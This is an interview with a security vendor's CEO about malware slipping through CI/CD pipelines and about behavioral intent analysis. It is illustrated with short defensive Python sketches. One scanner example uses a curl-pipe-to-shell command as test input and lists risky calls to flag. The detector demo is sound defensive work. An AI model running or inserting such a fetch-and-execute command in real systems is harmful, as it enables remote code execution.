When security decisions come too late, and attackers know it
In this Help Net Security interview, Chris O’Ferrell, CEO at CodeHunter, talks about why malware keeps succeeding, where attackers insert malicious code in the SDLC, and how CI/CD pipelines can become a quiet entry point. He also breaks down the difference between behavioral detection and behavioral intent analysis, and why explainable results matter for security teams.

What is the most common reason modern malware succeeds even in organizations with mature EDR and threat intel programs?
Modern malware succeeds because most security stacks still make decisions too late.
Even very mature EDR and threat intelligence programs are optimized around detection and response after something executes. They’re excellent at finding known bad activity, correlating signals, and helping teams respond quickly once intent becomes obvious. But attackers have learned how to live in the gray space before that moment, when code is new, signed, or sourced from somewhere that looks trustworthy.
AI-assisted malware mutation has accelerated this problem. Every artifact can be a first-seen event. Indicators age almost instantly. So when a tool isn’t sure, it labels something “unknown” or “suspicious” and hands it to an analyst. At scale, that creates a decision bottleneck. Malware gets through not because defenders miss it entirely, but because no system can say with confidence, early enough, whether that code should be allowed to run in the first place.
The attack surface has also shifted. A lot of malicious code today doesn’t arrive through obvious phishing or drive-by downloads. It enters quietly through software pipelines, automation workflows, and trusted internal systems: places that were never designed to be treated as hostile environments. Once code is inside those paths, it inherits trust by default.
If you look at the modern SDLC, where is the easiest point for an attacker to insert malicious runnable code with the lowest chance of detection?
In most enterprise development environments, the lowest-friction insertion point is almost always upstream, before execution ever happens.
CI/CD pipelines move huge volumes of runnable artifacts at machine speed: build outputs, scripts, installers, automation jobs, and third-party components. Most of these are never treated as malware candidates because they’re “internal,” signed, or produced by trusted tooling.
Attackers exploit that assumption. Compromise a dependency, tamper with a build step, or inject logic into an automation script, and the malicious behavior travels downstream wrapped in legitimacy. Traditional controls are focused on endpoints or runtime behavior, not on validating whether a build artifact or script should exist in the first place.
By the time something executes and looks suspicious, it’s already past the point where prevention was possible.
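To make that gap concrete, here is a minimal, hypothetical sketch of the kind of pre-execution gate the answer implies: a CI step that refuses to promote build artifacts unless they match an expected manifest. The manifest, digests, and function names are invented for illustration; a real pipeline would pull expectations from a signed source of truth, not a hardcoded dictionary.

```python
import hashlib
import sys
from pathlib import Path

# Hypothetical expected-artifact manifest (placeholder digests).
EXPECTED_SHA256 = {
    "installer.msi": "3f5a...placeholder...",
    "deploy.ps1": "9c1b...placeholder...",
}

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def gate(artifact_dir: str) -> int:
    for artifact in sorted(p for p in Path(artifact_dir).iterdir() if p.is_file()):
        expected = EXPECTED_SHA256.get(artifact.name)
        if expected is None or sha256_of(artifact) != expected:
            # Unknown or tampered artifact: fail the pipeline rather than
            # letting the artifact inherit the pipeline's trust downstream.
            print(f"BLOCK: {artifact.name} failed validation", file=sys.stderr)
            return 1
        print(f"PASS: {artifact.name}")
    return 0

if __name__ == "__main__":
    sys.exit(gate(sys.argv[1]))
```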
Many vendors claim “behavioral detection,” but their models still depend heavily on known malicious patterns. What is the difference between “behavioral detection” and “behavioral intent analysis” in your framework?
A lot of confusion comes from what problem the system is actually trying to solve.
Behavioral detection usually means observing activity and trying to correlate it to known malicious patterns, techniques, or families. Even when behavior is involved, the outcome is often probabilistic. When confidence is low, the result is a “suspicious” alert that still requires manual investigation.
Behavioral intent analysis asks a different question: What is this artifact designed to do if it runs? Instead of focusing on attribution or similarity, it examines execution paths and runtime actions to determine whether the behavior, regardless of novelty, introduces security, operational, or compliance risk.
Intent analysis treats behavior as a durable signal, not a hint. AI can rewrite appearance endlessly, but it can’t hide the fundamental actions code must take to achieve its objective. By categorizing and mapping those behaviors into consistent risk frameworks, intent analysis enables clear decisions even when the artifact is completely new.
In practical terms, behavioral detection helps you investigate. Behavioral intent analysis helps you decide with greater certainty and trust.
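A toy sketch can make the distinction concrete. The hashes, behavior names, and risk categories below are invented; the point is only that detection reasons from prior knowledge of the artifact, while intent analysis reasons from what the code would do if it ran.

```python
KNOWN_BAD_HASHES = {"e3b0c442...placeholder..."}  # signature-style knowledge

RISK_MAP = {  # invented behavior -> risk-category taxonomy
    "encrypts_user_files": "destructive",
    "disables_backups": "destructive",
    "exfiltrates_data": "confidentiality",
    "persists_via_registry": "persistence",
}

def behavioral_detection(artifact_hash: str) -> str:
    # Known-pattern world: a first-seen hash can only be "suspicious".
    return "malicious" if artifact_hash in KNOWN_BAD_HASHES else "suspicious"

def intent_analysis(behaviors: list[str]) -> str:
    # Novelty is irrelevant: judge the behaviors themselves.
    risks = {RISK_MAP[b] for b in behaviors if b in RISK_MAP}
    if risks & {"destructive", "confidentiality"}:
        return "block"
    return "review" if risks else "allow"

# A never-seen ransomware-like artifact: detection shrugs, intent decides.
print(behavioral_detection("first_seen_hash"))                       # suspicious
print(intent_analysis(["encrypts_user_files", "disables_backups"]))  # block
```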
Walk me through what your platform is actually doing under the hood. What parts are static control-flow analysis versus dynamic sandbox observation?
We use a hybrid analysis model designed to balance speed, depth, and determinism.
Static control-flow and behavioral analysis does much of the early work. By examining how execution paths unfold and what actions are possible based on the code itself, the system can identify risky intent without waiting for full execution. That’s essential in CI/CD environments where delays aren’t acceptable.
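As a simplified illustration of that idea (not CodeHunter’s engine, which analyzes binaries and full control flow), here is a sketch that statically walks Python source with the standard ast module and flags calls implying risky intent, without ever executing the code:

```python
import ast

RISKY_CALLS = {"exec", "eval", "system"}  # illustrative set only

def flag_risky_calls(source: str) -> list[tuple[int, str]]:
    """Parse source and report (line, call name) for risky call sites."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            # Handle both bare names (eval) and attributes (os.system).
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", "")
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return findings

sample = "import os\nos.system('curl http://example.com | sh')\n"
print(flag_risky_calls(sample))  # [(2, 'system')]
```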
Dynamic sandbox observation runs in parallel and adds runtime context. It helps validate behaviors that depend on the target environment and provides a basic readout of the artifact’s primary execution flow. However, a sandbox can struggle to detect activity that is delayed or triggered only by external input.
The key point is that decisions don’t hinge on a single detonation outcome or a short execution window. Static and dynamic findings are fused into a structured behavioral model that categorizes actions, maps them to impact, and produces a policy-ready verdict. That’s how you get fast answers without sacrificing depth or falling victim to evasion techniques designed to outwait sandboxes.
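A minimal sketch of that fusion step, with invented structures and policy rules: static and dynamic findings are merged into one behavior set, so a time-delayed action caught statically still drives the verdict even if a short sandbox run never observed it.

```python
def fuse_and_decide(static_behaviors: set[str],
                    dynamic_behaviors: set[str],
                    policy_blocklist: set[str]) -> dict:
    behaviors = static_behaviors | dynamic_behaviors  # union, not either/or
    violations = behaviors & policy_blocklist
    return {
        "behaviors": sorted(behaviors),
        "violations": sorted(violations),
        "verdict": "block" if violations else "allow",
    }

# Static analysis catches what a short sandbox run missed; the verdict
# reflects the full behavioral model, not a single detonation.
print(fuse_and_decide(
    static_behaviors={"deletes_shadow_copies"},
    dynamic_behaviors={"reads_config"},
    policy_blocklist={"deletes_shadow_copies"},
))
```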
Security leaders are increasingly skeptical of black-box AI security decisions. What does explainability mean in your product?
It means that every decision can be traced back to observable behavior and explicit policy logic, not opaque scores or model confidence levels. When a verdict is produced for an artifact, the system shows exactly which behaviors were identified, how they were categorized, and why those behaviors triggered a particular classification. Security teams don’t just get an outcome; they get the reasoning behind it.
AI plays a supporting role, helping surface patterns, summarize findings, and reduce analyst workload, but it doesn’t make enforcement decisions. In our system, artifact classifications are intentionally deterministic. The same artifact evaluated under the same policy will produce the same result every time.
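As a hypothetical illustration of what deterministic, explainable output looks like in practice: the verdict is a pure function of the observed behaviors and the policy, and it carries its own reasoning trace rather than a confidence score. Field names and rules here are invented.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Verdict:
    classification: str
    reasons: tuple[str, ...]  # the audit trail, not a confidence score

def classify(behaviors: frozenset[str], policy: dict[str, str]) -> Verdict:
    # Pure function of (behaviors, policy): no model state, no randomness.
    reasons = tuple(
        f"behavior '{b}' matched policy rule '{policy[b]}'"
        for b in sorted(behaviors) if b in policy
    )
    return Verdict("malicious" if reasons else "benign", reasons)

policy = {"exfiltrates_data": "deny-exfiltration"}
v1 = classify(frozenset({"exfiltrates_data"}), policy)
v2 = classify(frozenset({"exfiltrates_data"}), policy)
assert v1 == v2  # same artifact, same policy, same result, every time
print(v1.classification, v1.reasons)
```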
That consistency is critical for trust and governance. Security leaders need decisions that hold up during audits, incident reviews, and regulatory scrutiny. Explainable, deterministic models provide that defensibility, especially as AI-generated code and automated attacks continue to scale.
At the end of the day, explainability is what turns security from educated guesswork into an enforceable control system.